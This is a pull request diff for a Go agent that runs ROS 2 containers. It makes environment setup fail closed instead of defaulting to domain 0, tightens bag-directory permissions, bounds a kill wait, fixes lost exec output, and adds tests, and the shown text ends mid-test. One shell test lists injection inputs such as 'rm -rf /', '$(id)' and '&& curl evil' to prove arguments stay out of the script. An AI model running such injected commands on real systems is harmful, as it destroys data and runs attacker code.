### PR TITLE
Fix ROS 2 review findings: silent data loss, a deadlock, and fail-open isolation

### DIFF
--- a/Examples/ROS2/wendy.json
+++ b/Examples/ROS2/wendy.json
@@ -10,8 +10,7 @@
     "talker": { "context": "./talker" },
     "listener": {
       "context": "./listener",
-      "dependsOn": ["talker"],
-      "frameworks": { "ros2": { "domainId": 42, "rmw": "rmw_cyclonedds_cpp", "distro": "humble" } }
+      "dependsOn": ["talker"]
     }
   }
 }

--- a/go/internal/agent/containerd/client.go
+++ b/go/internal/agent/containerd/client.go
@@ -1129,7 +1129,13 @@ func (c *Client) CreateContainerWithProgress(ctx context.Context, req *agentpb.C
 	env = append(env, req.GetEnv()...)
 	env = appendFallbackEnv(env)
 	env = append(env, wendyEnv...)
-	env = append(env, buildROS2Env(appCfg, appID, serviceName)...)
+	ros2Env, err := buildROS2Env(appCfg, appID, serviceName)
+	if err != nil {
+		// Fail the create rather than start a ROS 2 container with no
+		// ROS_DOMAIN_ID, which silently lands it on the global default domain 0.
+		return fmt.Errorf("resolving ROS 2 environment for %q: %w", appID, err)
+	}
+	env = append(env, ros2Env...)
 	env = injectOTELEnvIfNeeded(env, appCfg, appID)
 
 	// Build OCI spec using local oci package, then apply entitlements.
@@ -2199,20 +2205,30 @@ const cycloneDDSInlineConfig = `<CycloneDDS><Domain><SharedMemory><Enable>false<
 // buildROS2Env returns ROS2 environment variables for the container resolved
 // from the app's frameworks.ros2 config (group-level, overridden by the
 // service-level config for multi-service apps). The injected set is
-// ROS_DOMAIN_ID, RMW_IMPLEMENTATION, CYCLONEDDS_URI (CycloneDDS only), and
-// ROS_LOCALHOST_ONLY (WDY-884).
-func buildROS2Env(appCfg *appconfig.AppConfig, appID, serviceName string) []string {
+// ROS_DOMAIN_ID, RMW_IMPLEMENTATION, CYCLONEDDS_URI (CycloneDDS only), and both
+// discovery-scope variables (WDY-884).
+//
+// Returns an error rather than nil for an invalid config. It used to return nil,
+// which meant the container started with *no* ROS 2 environment at all — so
+// ROS_DOMAIN_ID fell back to 0, the global default domain everything else is on.
+// A validation gap upstream therefore produced maximum exposure instead of a
+// failure, which is the wrong direction for a mechanism whose job is isolation.
+func buildROS2Env(appCfg *appconfig.AppConfig, appID, serviceName string) ([]string, error) {
 	ros2 := appCfg.ResolveROS2ConfigForService(serviceName)
 	if ros2 == nil {
-		return nil
+		return nil, nil
 	}
 	domainID := ros2.ResolvedDomainID(appID)
 	if domainID < 0 {
-		return nil // invalid explicit domain ID; caller should have validated at config parse time
+		return nil, fmt.Errorf("frameworks.ros2.domainId is outside [%d,%d]; refusing to start "+
+			"the container without ROS_DOMAIN_ID isolation (it would default to domain 0)",
+			appconfig.ROS2DomainIDMin, appconfig.ROS2DomainIDMax)
 	}
 	discoveryScope := ros2.ResolvedDiscoveryScope()
 	if discoveryScope == "" {
-		return nil // invalid scope; caller should have validated at config parse time
+		return nil, fmt.Errorf("frameworks.ros2.discoveryScope %q is not %q or %q; refusing to "+
+			"start the container with an undefined DDS discovery scope",
+			ros2.DiscoveryScope, appconfig.ROS2DiscoveryScopeApp, appconfig.ROS2DiscoveryScopeHost)
 	}
 	env := []string{fmt.Sprintf("ROS_DOMAIN_ID=%d", domainID)}
 	// ResolvedRMW validates against a fixed allowlist and returns "" for
@@ -2226,12 +2242,19 @@ func buildROS2Env(appCfg *appconfig.AppConfig, appID, serviceName string) []stri
 	}
 	// Services are app-local by default. Host-scoped tools such as Foxglove
 	// explicitly opt in to discovering ROS 2 participants on the device network.
+	//
+	// Both variables are set, not just ROS_LOCALHOST_ONLY. That one has been
+	// deprecated since Iron in favour of ROS_AUTOMATIC_DISCOVERY_RANGE, and
+	// ROS2Config.Distro explicitly advertises "jazzy" — so on the newer distros we
+	// claim to support, the sole mechanism enforcing app-local isolation was at
+	// best deprecated. For an app carrying `network: host` it is the only thing
+	// between that app and every other DDS participant on the device.
 	if discoveryScope == appconfig.ROS2DiscoveryScopeHost {
-		env = append(env, "ROS_LOCALHOST_ONLY=0")
+		env = append(env, "ROS_LOCALHOST_ONLY=0", "ROS_AUTOMATIC_DISCOVERY_RANGE=SUBNET")
 	} else {
-		env = append(env, "ROS_LOCALHOST_ONLY=1")
+		env = append(env, "ROS_LOCALHOST_ONLY=1", "ROS_AUTOMATIC_DISCOVERY_RANGE=LOCALHOST")
 	}
-	return env
+	return env, nil
 }
 
 // injectOTELEnvIfNeeded appends OTEL exporter env vars to env when host

--- a/go/internal/agent/containerd/client_test.go
+++ b/go/internal/agent/containerd/client_test.go
@@ -1035,7 +1035,7 @@ func TestBuildROS2Env_WithConfig(t *testing.T) {
 			},
 		},
 	}
-	got := buildROS2Env(cfg, "com.example.app", "")
+	got := mustBuildROS2Env(t, cfg, "com.example.app", "")
 	for _, want := range []string{
 		"ROS_DOMAIN_ID=42",
 		"RMW_IMPLEMENTATION=rmw_cyclonedds_cpp",
@@ -1052,7 +1052,7 @@ func TestBuildROS2Env_WithConfig(t *testing.T) {
 
 func TestBuildROS2Env_NoConfig(t *testing.T) {
 	cfg := &appconfig.AppConfig{}
-	got := buildROS2Env(cfg, "com.example.app", "")
+	got := mustBuildROS2Env(t, cfg, "com.example.app", "")
 	if len(got) != 0 {
 		t.Errorf("expected empty env for no ROS2 config, got %v", got)
 	}
@@ -1068,7 +1068,7 @@ func TestBuildROS2Env_HostDiscovery(t *testing.T) {
 			},
 		},
 	}
-	got := buildROS2Env(cfg, "sh.wendy.foxglovebridge", "")
+	got := mustBuildROS2Env(t, cfg, "sh.wendy.foxglovebridge", "")
 	if !envContains(got, "ROS_LOCALHOST_ONLY=0") {
 		t.Errorf("expected host discovery to disable localhost-only mode, got %v", got)
 	}
@@ -1081,7 +1081,7 @@ func TestBuildROS2Env_AutoDomainID(t *testing.T) {
 	cfg := &appconfig.AppConfig{
 		Frameworks: &appconfig.FrameworksConfig{ROS2: &appconfig.ROS2Config{}},
 	}
-	got := buildROS2Env(cfg, "com.example.app", "")
+	got := mustBuildROS2Env(t, cfg, "com.example.app", "")
 	val, ok := envValue(got, "ROS_DOMAIN_ID")
 	if !ok {
 		t.Fatalf("expected ROS_DOMAIN_ID in env, got %v", got)
@@ -1091,7 +1091,7 @@ func TestBuildROS2Env_AutoDomainID(t *testing.T) {
 		t.Errorf("auto domain ID = %q, want integer in [0,232]", val)
 	}
 	// Stable: a second call for the same appId must produce the same ID.
-	again := buildROS2Env(cfg, "com.example.app", "")
+	again := mustBuildROS2Env(t, cfg, "com.example.app", "")
 	if val2, _ := envValue(again, "ROS_DOMAIN_ID"); val2 != val {
 		t.Errorf("auto domain ID not stable: %q vs %q", val, val2)
 	}
@@ -1108,8 +1108,18 @@ func TestBuildROS2Env_InvalidDomainID(t *testing.T) {
 			ROS2: &appconfig.ROS2Config{DomainID: &domainID},
 		},
 	}
-	if got := buildROS2Env(cfg, "com.example.app", ""); len(got) != 0 {
-		t.Errorf("expected empty env for out-of-range domain ID, got %v", got)
+	// Previously this returned an empty env, which meant the container started
+	// with no ROS_DOMAIN_ID at all and fell back to the global default domain 0 —
+	// i.e. a validation gap produced maximum exposure. It must fail instead.
+	got, err := buildROS2Env(cfg, "com.example.app", "")
+	if err == nil {
+		t.Fatalf("expected an error for out-of-range domain ID, got env %v", got)
+	}
+	if got != nil {
+		t.Errorf("expected nil env alongside the error, got %v", got)
+	}
+	if !strings.Contains(err.Error(), "domain 0") {
+		t.Errorf("error should explain the domain-0 fallback it is preventing, got: %v", err)
 	}
 }
 
@@ -1119,7 +1129,7 @@ func TestBuildROS2Env_NonCycloneRMWSkipsCycloneURI(t *testing.T) {
 			ROS2: &appconfig.ROS2Config{RMW: "fastrtps"},
 		},
 	}
-	got := buildROS2Env(cfg, "com.example.app", "")
+	got := mustBuildROS2Env(t, cfg, "com.example.app", "")
 	if !envContains(got, "RMW_IMPLEMENTATION=rmw_fastrtps_cpp") {
 		t.Errorf("expected short rmw name to normalize to rmw_fastrtps_cpp, got %v", got)
 	}
@@ -1139,11 +1149,11 @@ func TestBuildROS2Env_ServiceOverride(t *testing.T) {
 			"camera": {},
 		},
 	}
-	got := buildROS2Env(cfg, "com.example.app", "detector")
+	got := mustBuildROS2Env(t, cfg, "com.example.app", "detector")
 	if !envContains(got, "ROS_DOMAIN_ID=7") {
 		t.Errorf("expected service-level override ROS_DOMAIN_ID=7, got %v", got)
 	}
-	got = buildROS2Env(cfg, "com.example.app", "camera")
+	got = mustBuildROS2Env(t, cfg, "com.example.app", "camera")
 	if !envContains(got, "ROS_DOMAIN_ID=1") {
 		t.Errorf("expected group-level ROS_DOMAIN_ID=1 for camera, got %v", got)
 	}

--- a/go/internal/agent/containerd/ros2.go
+++ b/go/internal/agent/containerd/ros2.go
@@ -38,6 +38,11 @@ const (
 	// list and stream bags without exec round-trips.
 	ROS2BagDir = "/var/wendy/ros2-bags"
 
+	// ROS2BagDirMode keeps recordings off world-readable. Bags carry raw sensor
+	// data — camera frames, lidar, audio, positions — so 0o755 was more open than
+	// it needed to be.
+	ROS2BagDirMode = 0o750
+
 	// labelKeyROS2Sidecar marks the sidecar container and stores its distro.
 	// The sidecar intentionally has no sh.wendy/app.version label so it never
 	// appears in ListContainers output.
@@ -68,6 +73,11 @@ const (
 	// escalating to SIGKILL. `ros2 bag record` needs the grace period to
 	// finalize the bag on disk.
 	ros2ExecStopGrace = 10 * time.Second
+
+	// ros2ExecKillWait bounds the wait for the exit status after SIGKILL. The
+	// previous bare channel receive could hold the RPC — and one of the sidecar's
+	// ros2MaxConcurrentExecs slots — forever if the shim never reported.
+	ros2ExecKillWait = 15 * time.Second
 
 	// ros2MaxConcurrentExecs is the maximum number of simultaneous ExecROS2
 	// calls allowed against a single sidecar. Beyond this the exec is rejected
@@ -342,7 +352,10 @@ func (c *Client) ensureOneROS2Sidecar(ctx context.Context, anchor *services.ROS2
 			zap.String("rmw", rmw), zap.String("image", image.Name()), zap.String("anchor", anchor.ContainerID))
 	}
 
-	if err := os.MkdirAll(ROS2BagDir, 0o755); err != nil {
+	// 0o750, not 0o755: rosbag2 recordings are raw sensor data (camera frames,
+	// lidar, audio, positions) and there is no reason for every local account on
+	// the device to be able to read them.
+	if err := os.MkdirAll(ROS2BagDir, ROS2BagDirMode); err != nil {
 		return services.ROS2Sidecar{}, fmt.Errorf("creating bag directory: %w", err)
 	}
 
@@ -461,6 +474,37 @@ func (c *Client) ensureOneROS2Sidecar(ctx context.Context, anchor *services.ROS2
 	return sidecar, nil
 }
 
+// ros2ShellArgs builds the argv for running `script` inside the sidecar, with
+// `extra` appended as positional arguments ("$@" starts at $1).
+//
+// Uses `/bin/sh` rather than `/bin/bash`. Every non-FastRTPS RMW — which includes
+// the CycloneDDS default, i.e. the common case — reuses the *app's own image* as
+// the sidecar image, and a slim ROS image (the natural target for a C++ or Swift
+// node) frequently ships no bash. That made the CLI probe fail with an opaque
+// setup error and then every `wendy device ros2` command fail with a bare exec
+// error. `source` is a bashism, so it becomes `.`, which is POSIX and works in
+// bash too.
+//
+// Split out as a pure function so the shell contract is unit-testable without
+// containerd.
+func ros2ShellArgs(distro, script string, extra []string) []string {
+	args := []string{"/bin/sh", "-c", script}
+	if extra != nil {
+		// argv[0] for the script's positional parameters; "$@" then starts at the
+		// first element of extra.
+		args = append(args, "ros2")
+		args = append(args, extra...)
+	}
+	return args
+}
+
+// ros2SourceAndExec is the shell script the sidecar runs for a `ros2` invocation:
+// source the ROS environment, then exec the CLI with the caller's arguments kept
+// out of shell interpretation via "$@" (SOC2-CC6, ISO27001-A.8, NIST-SI-10).
+func ros2SourceAndExec(distro string) string {
+	return fmt.Sprintf(". /opt/ros/%s/setup.bash >/dev/null 2>&1 && exec ros2 \"$@\"", distro)
+}
+
 // sidecarHasROS2CLI reports whether the running sidecar task can find the ros2
 // CLI on PATH after sourcing the ROS environment. Used to fail loudly when a
 // reused app image shipped the RMW but not ros2cli (WDY-1593). A probe-setup
@@ -473,10 +517,9 @@ func (c *Client) sidecarHasROS2CLI(ctx context.Context, container containerd.Con
 	}
 	pspec := spec.Process
 	pspec.Terminal = false
-	pspec.Args = []string{
-		"/bin/bash", "-lc",
-		fmt.Sprintf("source /opt/ros/%s/setup.bash >/dev/null 2>&1; command -v ros2 >/dev/null 2>&1", distro),
-	}
+	pspec.Args = ros2ShellArgs(distro,
+		fmt.Sprintf(". /opt/ros/%s/setup.bash >/dev/null 2>&1; command -v ros2 >/dev/null 2>&1", distro),
+		nil)
 	execID := fmt.Sprintf("ros2-probe-%d", ros2ExecCounter.Add(1))
 	proc, err := task.Exec(ctx, execID, pspec, cio.NullIO)
 	if err != nil {
@@ -812,19 +855,21 @@ func (c *Client) ExecROS2(ctx context.Context, opts services.ROS2ExecOptions, st
 	pspec := spec.Process
 	// The ROS environment lives in /opt/ros/<distro>/setup.bash; the "$@"
 	// indirection keeps user-supplied args out of shell interpretation
-	// (SOC2-CC6, ISO27001-A.8, NIST-SI-10).
+	// (SOC2-CC6, ISO27001-A.8, NIST-SI-10). See ros2ShellArgs for why this is
+	// /bin/sh rather than /bin/bash.
 	pspec.Terminal = false
-	pspec.Args = append([]string{
-		"/bin/bash", "-c",
-		fmt.Sprintf("source /opt/ros/%s/setup.bash >/dev/null 2>&1 && exec ros2 \"$@\"", distro),
-		"ros2",
-	}, opts.Args...)
+	pspec.Args = ros2ShellArgs(distro, ros2SourceAndExec(distro), opts.Args)
 	// Copy pspec.Env before appending to avoid mutating the slice header returned
 	// by container.Spec (future callers might cache the spec or share the backing
 	// array across execs — defensive copy prevents env bleed-over, L5, WDY-1706).
+	//
+	// ROS_AUTOMATIC_DISCOVERY_RANGE accompanies ROS_LOCALHOST_ONLY for the same
+	// reason as in buildROS2Env: the latter has been deprecated since Iron, and the
+	// sidecar has to see the same graph as the app it is anchored to.
 	pspec.Env = append(append([]string(nil), pspec.Env...),
 		"ROS_DOMAIN_ID="+strconv.Itoa(opts.DomainID),
 		"ROS_LOCALHOST_ONLY=1",
+		"ROS_AUTOMATIC_DISCOVERY_RANGE=LOCALHOST",
 	)
 	// Match the anchor app's RMW so the CLI speaks the same DDS implementation;
 	// otherwise it falls to the image default and sees nothing on another RMW
@@ -865,18 +910,46 @@ func (c *Client) ExecROS2(ctx context.Context, opts services.ROS2ExecOptions, st
 		return -1, fmt.Errorf("starting ROS 2 exec: %w", err)
 	}
 
+	// drainIO waits for containerd's cio copy goroutines to finish moving the
+	// FIFOs into stdout/stderr.
+	//
+	// The exit status arriving does NOT mean the output has been copied. The
+	// deferred proc.Delete then calls cio.Cancel(), which *closes the read ends of
+	// the FIFOs* and aborts any copy still in flight (containerd v2
+	// pkg/cio/io_unix.go copyIO + client/process.go Delete). So the tail of a
+	// command's output could be silently dropped — and every caller here hands
+	// stdout straight to a parser, which then reported a partial topic/node list
+	// with exit code 0. Waiting here first lets the copies finish naturally: the
+	// writer side is already closed by the exited process, so each copy sees a
+	// clean EOF.
+	drainIO := func() {
+		if pio := proc.IO(); pio != nil {
+			pio.Wait()
+		}
+	}
+
 	select {
 	case st := <-statusC:
+		drainIO()
 		return int(st.ExitCode()), st.Error()
 	case <-ctx.Done():
 		_ = proc.Kill(nctx, syscall.SIGINT)
 		select {
 		case st := <-statusC:
+			drainIO()
 			return int(st.ExitCode()), ctx.Err()
 		case <-time.After(ros2ExecStopGrace):
 			_ = proc.Kill(nctx, syscall.SIGKILL)
-			st := <-statusC
-			return int(st.ExitCode()), ctx.Err()
+			// Bounded: a wedged shim would otherwise hold this RPC (and one of the
+			// sidecar's ros2MaxConcurrentExecs slots) forever.
+			select {
+			case st := <-statusC:
+				drainIO()
+				return int(st.ExitCode()), ctx.Err()
+			case <-time.After(ros2ExecKillWait):
+				return -1, fmt.Errorf("ROS 2 exec did not exit within %s of SIGKILL: %w",
+					ros2ExecKillWait, ctx.Err())
+			}
 		}
 	}
 }

--- a/go/internal/agent/containerd/ros2_env_test.go
+++ b/go/internal/agent/containerd/ros2_env_test.go
@@ -1,0 +1,148 @@
+package containerd
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/wendylabsinc/wendy/go/internal/shared/appconfig"
+)
+
+// mustBuildROS2Env is the happy-path helper for the existing tests, which were
+// written against buildROS2Env's old single-return signature. It now returns an
+// error so an unresolvable config fails the container create instead of silently
+// starting it with no ROS 2 environment (see TestBuildROS2Env_InvalidDomainID).
+func mustBuildROS2Env(t *testing.T, cfg *appconfig.AppConfig, appID, serviceName string) []string {
+	t.Helper()
+	env, err := buildROS2Env(cfg, appID, serviceName)
+	if err != nil {
+		t.Fatalf("buildROS2Env(%q, %q): %v", appID, serviceName, err)
+	}
+	return env
+}
+
+// App-local isolation used to rest entirely on ROS_LOCALHOST_ONLY, which has been
+// deprecated since ROS 2 Iron in favour of ROS_AUTOMATIC_DISCOVERY_RANGE — while
+// ROS2Config.Distro explicitly advertises "jazzy". On the newer distros we claim
+// to support, the sole mechanism enforcing the documented "app" scope was at best
+// deprecated; for an app carrying `network: host` it is the only thing between it
+// and every other DDS participant on the device.
+
+func TestBuildROS2Env_AppScopeSetsBothDiscoveryVariables(t *testing.T) {
+	domainID := 42
+	cfg := &appconfig.AppConfig{
+		Frameworks: &appconfig.FrameworksConfig{
+			ROS2: &appconfig.ROS2Config{DomainID: &domainID},
+		},
+	}
+	env := mustBuildROS2Env(t, cfg, "com.example.app", "")
+	for _, want := range []string{
+		"ROS_LOCALHOST_ONLY=1",                    // pre-Iron
+		"ROS_AUTOMATIC_DISCOVERY_RANGE=LOCALHOST", // Iron and later
+	} {
+		if !envContains(env, want) {
+			t.Errorf("app scope must set %s, got %v", want, env)
+		}
+	}
+}
+
+func TestBuildROS2Env_HostScopeSetsBothDiscoveryVariables(t *testing.T) {
+	domainID := 30
+	cfg := &appconfig.AppConfig{
+		Frameworks: &appconfig.FrameworksConfig{
+			ROS2: &appconfig.ROS2Config{
+				DomainID:       &domainID,
+				DiscoveryScope: appconfig.ROS2DiscoveryScopeHost,
+			},
+		},
+	}
+	env := mustBuildROS2Env(t, cfg, "sh.wendy.foxglovebridge", "")
+	for _, want := range []string{
+		"ROS_LOCALHOST_ONLY=0",
+		"ROS_AUTOMATIC_DISCOVERY_RANGE=SUBNET",
+	} {
+		if !envContains(env, want) {
+			t.Errorf("host scope must set %s, got %v", want, env)
+		}
+	}
+	if envContains(env, "ROS_AUTOMATIC_DISCOVERY_RANGE=LOCALHOST") {
+		t.Errorf("host scope must not restrict discovery to localhost, got %v", env)
+	}
+}
+
+func TestBuildROS2Env_DiscoveryVariablesAgreeWithEachOther(t *testing.T) {
+	// The two variables must never disagree — a container that is localhost-only
+	// under one and subnet-wide under the other is the worst of both worlds.
+	for _, scope := range []string{appconfig.ROS2DiscoveryScopeApp, appconfig.ROS2DiscoveryScopeHost} {
+		cfg := &appconfig.AppConfig{
+			Frameworks: &appconfig.FrameworksConfig{
+				ROS2: &appconfig.ROS2Config{DiscoveryScope: scope},
+			},
+		}
+		env := mustBuildROS2Env(t, cfg, "com.example.app", "")
+		localhostOnly, _ := envValue(env, "ROS_LOCALHOST_ONLY")
+		discoveryRange, _ := envValue(env, "ROS_AUTOMATIC_DISCOVERY_RANGE")
+		restrictedByOld := localhostOnly == "1"
+		restrictedByNew := discoveryRange == "LOCALHOST"
+		if restrictedByOld != restrictedByNew {
+			t.Errorf("scope %q: ROS_LOCALHOST_ONLY=%q disagrees with ROS_AUTOMATIC_DISCOVERY_RANGE=%q",
+				scope, localhostOnly, discoveryRange)
+		}
+	}
+}
+
+func TestBuildROS2Env_InvalidDiscoveryScopeIsAnError(t *testing.T) {
+	// Same fail-closed reasoning as an out-of-range domain ID: returning an empty
+	// env would start the container with no scope enforcement at all.
+	cfg := &appconfig.AppConfig{
+		Frameworks: &appconfig.FrameworksConfig{
+			ROS2: &appconfig.ROS2Config{DiscoveryScope: "everywhere"},
+		},
+	}
+	env, err := buildROS2Env(cfg, "com.example.app", "")
+	if err == nil {
+		t.Fatalf("expected an error for an unknown discoveryScope, got env %v", env)
+	}
+	if env != nil {
+		t.Errorf("expected nil env alongside the error, got %v", env)
+	}
+	if !strings.Contains(err.Error(), "everywhere") {
+		t.Errorf("error should quote the offending value, got: %v", err)
+	}
+}
+
+func TestBuildROS2Env_NoROS2ConfigIsNotAnError(t *testing.T) {
+	// A non-ROS 2 app must keep working: nil env, nil error.
+	env, err := buildROS2Env(&appconfig.AppConfig{}, "com.example.app", "")
+	if err != nil {
+		t.Fatalf("a non-ROS 2 app must not error: %v", err)
+	}
+	if len(env) != 0 {
+		t.Errorf("expected no env for a non-ROS 2 app, got %v", env)
+	}
+}
+
+// The auto domain ID is a 233-bucket FNV hash of the appId. It is a convenience,
+// not an isolation boundary — with ~18 apps on a device the birthday bound gives
+// a better-than-even chance two share a domain. Pin the range and the stability,
+// and document the collision property so nobody mistakes it for isolation.
+func TestROS2AutoDomainID_RangeAndStability(t *testing.T) {
+	ids := map[int]string{}
+	for _, appID := range []string{
+		"com.example.a", "com.example.b", "com.example.c", "sh.wendy.foxglovebridge",
+		"sh.wendy.examples.ros2", "org.robot.nav", "org.robot.perception",
+	} {
+		id := appconfig.ROS2AutoDomainID(appID)
+		if id < appconfig.ROS2DomainIDMin || id > appconfig.ROS2DomainIDMax {
+			t.Errorf("ROS2AutoDomainID(%q) = %d, outside [%d,%d]",
+				appID, id, appconfig.ROS2DomainIDMin, appconfig.ROS2DomainIDMax)
+		}
+		if again := appconfig.ROS2AutoDomainID(appID); again != id {
+			t.Errorf("ROS2AutoDomainID(%q) not stable: %d then %d", appID, id, again)
+		}
+		if prev, ok := ids[id]; ok {
+			t.Logf("domain %d shared by %q and %q — expected: 233 buckets is a "+
+				"convenience default, not an isolation boundary", id, prev, appID)
+		}
+		ids[id] = appID
+	}
+}

--- a/go/internal/agent/containerd/ros2_shell_test.go
+++ b/go/internal/agent/containerd/ros2_shell_test.go
@@ -1,0 +1,104 @@
+package containerd
+
+import (
+	"strings"
+	"testing"
+)
+
+// The sidecar ran commands through `/bin/bash`. Every non-FastRTPS RMW — which
+// includes the CycloneDDS default, i.e. the common case — reuses the *app's own
+// image* as the sidecar image, and a slim ROS image (the natural target for a C++
+// or Swift node) frequently ships no bash. That made the ros2cli probe fail with
+// an opaque setup error, after which every `wendy device ros2` command failed with
+// a bare exec error and no hint about the cause.
+
+func TestROS2ShellArgs_UsesPOSIXShell(t *testing.T) {
+	args := ros2ShellArgs("humble", ros2SourceAndExec("humble"), []string{"topic", "list"})
+	if args[0] != "/bin/sh" {
+		t.Errorf("shell = %q, want /bin/sh (a slim app image may ship no bash)", args[0])
+	}
+	if args[1] != "-c" {
+		t.Errorf("args[1] = %q, want -c", args[1])
+	}
+}
+
+func TestROS2SourceAndExec_UsesPOSIXSourceBuiltin(t *testing.T) {
+	script := ros2SourceAndExec("humble")
+	if strings.Contains(script, "source ") {
+		t.Errorf("`source` is a bashism; use `.` so the script runs under /bin/sh: %q", script)
+	}
+	if !strings.HasPrefix(script, ". /opt/ros/humble/setup.bash") {
+		t.Errorf("script should dot-source the distro's setup.bash, got %q", script)
+	}
+	if !strings.Contains(script, `exec ros2 "$@"`) {
+		t.Errorf(`script must keep caller args out of shell interpretation via "$@", got %q`, script)
+	}
+}
+
+// The "$@" indirection is the whole reason user arguments cannot be interpreted
+// by the shell: they arrive as separate argv entries, never spliced into the
+// script text.
+func TestROS2ShellArgs_UserArgsStayOutOfTheScript(t *testing.T) {
+	nasty := []string{"topic", "echo", "/chatter; rm -rf /", "$(id)", "`whoami`", "&& curl evil"}
+	args := ros2ShellArgs("humble", ros2SourceAndExec("humble"), nasty)
+
+	script := args[2]
+	for _, arg := range nasty {
+		if strings.Contains(script, arg) {
+			t.Errorf("user argument %q was spliced into the script text: %q", arg, script)
+		}
+	}
+	// argv[0] for the script, then the caller's arguments verbatim as separate
+	// entries.
+	if args[3] != "ros2" {
+		t.Errorf(`args[3] = %q, want "ros2" ($0 for the script)`, args[3])
+	}
+	got := args[4:]
+	if len(got) != len(nasty) {
+		t.Fatalf("forwarded %d args, want %d: %q", len(got), len(nasty), got)
+	}
+	for i, want := range nasty {
+		if got[i] != want {
+			t.Errorf("arg %d = %q, want %q (verbatim, unmodified)", i, got[i], want)
+		}
+	}
+}
+
+func TestROS2ShellArgs_NilExtraOmitsPositionalArgv(t *testing.T) {
+	// The ros2cli probe runs a self-contained script with no positional args, so
+	// it must not get a stray "ros2" argv entry.
+	args := ros2ShellArgs("humble", "command -v ros2 >/dev/null 2>&1", nil)
+	if len(args) != 3 {
+		t.Fatalf("got %d args, want 3: %q", len(args), args)
+	}
+	if args[0] != "/bin/sh" || args[1] != "-c" {
+		t.Errorf("unexpected shell invocation: %q", args)
+	}
+}
+
+func TestROS2ShellArgs_EmptyExtraStillGetsArgvZero(t *testing.T) {
+	// A ros2 invocation with no arguments is still a ros2 invocation.
+	args := ros2ShellArgs("humble", ros2SourceAndExec("humble"), []string{})
+	if len(args) != 4 || args[3] != "ros2" {
+		t.Errorf("got %q, want the script plus an argv[0]", args)
+	}
+}
+
+func TestROS2SourceAndExecUsesTheGivenDistro(t *testing.T) {
+	for _, distro := range []string{"humble", "jazzy", "iron"} {
+		script := ros2SourceAndExec(distro)
+		if !strings.Contains(script, "/opt/ros/"+distro+"/setup.bash") {
+			t.Errorf("distro %q not reflected in the script: %q", distro, script)
+		}
+	}
+}
+
+func TestROS2BagDirModeIsNotWorldReadable(t *testing.T) {
+	// Bags hold raw sensor data; 0o755 let every local account read them.
+	if ROS2BagDirMode&0o007 != 0 {
+		t.Errorf("ROS2BagDirMode = %#o, want no world bits", ROS2BagDirMode)
+	}
+	if ROS2BagDirMode&0o700 != 0o700 {
+		t.Errorf("ROS2BagDirMode = %#o, owner must retain rwx", ROS2BagDirMode)
+	}
+}

--- a/go/internal/agent/services/ros2_routing_test.go
+++ b/go/internal/agent/services/ros2_routing_test.go
@@ -1,0 +1,283 @@
+package services
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"testing"
+	"time"
+
+	agentpbv2 "github.com/wendylabsinc/wendy/go/proto/gen/agentpb/v2"
+)
+
+// Two costs this covers:
+//
+//  1. GetGraph ran `ros2 node info` once per node, serially. An exec is ~1s
+//     (container exec dispatch + sourcing setup.bash + a fresh rclpy process
+//     doing DDS discovery), so a 40-node robot took 40s+ for one
+//     `wendy device ros2 graph`. ListTopics was already fanned out; this was not.
+//  2. pickSidecarOwning ran an extra `<kind> list` exec *per sidecar* on every
+//     targeted call, to choose between candidates — including when there was only
+//     one candidate, i.e. on essentially every real device.
+
+// countingRuntime answers node list/info and records call counts + concurrency.
+type countingRuntime struct {
+	sidecars []ROS2Sidecar
+	nodes    []string
+
+	mu          sync.Mutex
+	calls       []string
+	inFlight    int32
+	maxInFlight int32
+	// delay is applied to `node info` so overlap is observable.
+	delay time.Duration
+}
+
+func (c *countingRuntime) FindROS2Containers(context.Context) ([]ROS2Target, error) {
+	return nil, nil
+}
+func (c *countingRuntime) EnsureROS2Sidecars(context.Context) ([]ROS2Sidecar, error) {
+	return c.sidecars, nil
+}
+func (c *countingRuntime) StopROS2Sidecar(context.Context) error   { return nil }
+func (c *countingRuntime) VerifyROS2Sidecar(context.Context) error { return nil }
+
+func (c *countingRuntime) ExecROS2(_ context.Context, opts ROS2ExecOptions, stdout, _ io.Writer) (int, error) {
+	joined := strings.Join(opts.Args, " ")
+	c.mu.Lock()
+	c.calls = append(c.calls, opts.SidecarName+"|"+joined)
+	c.mu.Unlock()
+
+	switch {
+	case joined == "node list":
+		_, _ = io.WriteString(stdout, strings.Join(c.nodes, "\n")+"\n")
+		return 0, nil
+	case strings.HasPrefix(joined, "node info "):
+		n := atomic.AddInt32(&c.inFlight, 1)
+		for {
+			cur := atomic.LoadInt32(&c.maxInFlight)
+			if n <= cur || atomic.CompareAndSwapInt32(&c.maxInFlight, cur, n) {
+				break
+			}
+		}
+		if c.delay > 0 {
+			time.Sleep(c.delay)
+		}
+		atomic.AddInt32(&c.inFlight, -1)
+		node := strings.TrimPrefix(joined, "node info ")
+		fmt.Fprintf(stdout, "%s\n  Subscribers:\n    /in: std_msgs/msg/String\n  Publishers:\n    /out: std_msgs/msg/String\n", node)
+		return 0, nil
+	}
+	return 1, nil
+}
+
+func (c *countingRuntime) callsMatching(substr string) int {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+	n := 0
+	for _, call := range c.calls {
+		if strings.Contains(call, substr) {
+			n++
+		}
+	}
+	return n
+}
+
+func TestROS2Service_GetGraph_NodeInfoRunsConcurrently(t *testing.T) {
+	var nodes []string
+	for i := 0; i < 24; i++ {
+		nodes = append(nodes, fmt.Sprintf("/node_%02d", i))
+	}
+	rt := &countingRuntime{
+		sidecars: []ROS2Sidecar{{Name: "sc", Distro: "humble", DomainID: 7}},
+		nodes:    nodes,
+		delay:    40 * time.Millisecond,
+	}
+	svc := newTestROS2Service(t, rt, t.TempDir())
+
+	start := time.Now()
+	resp, err := svc.GetGraph(context.Background(), &agentpbv2.GetROS2GraphRequest{})
+	elapsed := time.Since(start)
+	if err != nil {
+		t.Fatalf("GetGraph: %v", err)
+	}
+
+	if got := len(resp.GetNodes()); got != len(nodes) {
+		t.Errorf("got %d nodes, want %d", got, len(nodes))
+	}
+	if rt.maxInFlight < 2 {
+		t.Errorf("max concurrent `node info` execs = %d, want > 1 (they ran serially)", rt.maxInFlight)
+	}
+	if rt.maxInFlight > ros2TopicInfoConcurrency {
+		t.Errorf("max concurrent = %d, exceeds the %d bound; this can starve other "+
+			"RPCs against the sidecar's exec table", rt.maxInFlight, ros2TopicInfoConcurrency)
+	}
+	// Serial would be 24*40ms = 960ms. Bounded at 8, expect ~3 waves = ~120ms.
+	if elapsed > 700*time.Millisecond {
